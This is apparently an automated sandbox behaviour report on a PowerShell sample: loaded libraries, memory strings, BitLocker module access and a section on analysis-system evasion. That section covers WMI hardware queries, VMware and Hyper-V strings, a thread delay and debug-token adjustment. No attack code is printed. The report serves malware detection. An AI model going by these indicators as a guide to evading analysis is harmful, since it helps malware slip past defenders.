Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.15489547647.000001A3F3DF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbg source: powershell.exe, 00000000.00000002.15489547647.000001A3F3DF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.15487537362.000001A3F3B4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbJ']{S source: powershell.exe, 00000000.00000002.15487537362.000001A3F3AC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.15489547647.000001A3F3DF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.15489547647.000001A3F3E5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.15489547647.000001A3F3DF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15486330108.000001A3F37B8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF828C8D2A5 pushad ; iretd 0_2_00007FF828C8D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF828DA2325 push eax; iretd 0_2_00007FF828DA233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF829051E73 push eax; iretd 0_2_00007FF829052129
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF829055B13 push eax; retf 0_2_00007FF829055B39
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF829053B40 pushad ; retf 0_2_00007FF829053B41
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF829053BE8 pushad ; retf 0_2_00007FF829053C09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8290539EA pushad ; retf 0_2_00007FF8290539EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF829015AFF pushfd ; retf 5F24h0_2_00007FF829015A71

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9894Jump to behavior
Source: powershell.exe, 00000000.00000002.15486330108.000001A3F37CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus8n}
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC38A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.15487537362.000001A3F3A83000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC38A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15457115971.000001A3D9802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.15487537362.000001A3F3A83000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15457115971.000001A3D9802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.15489547647.000001A3F3E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC38A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
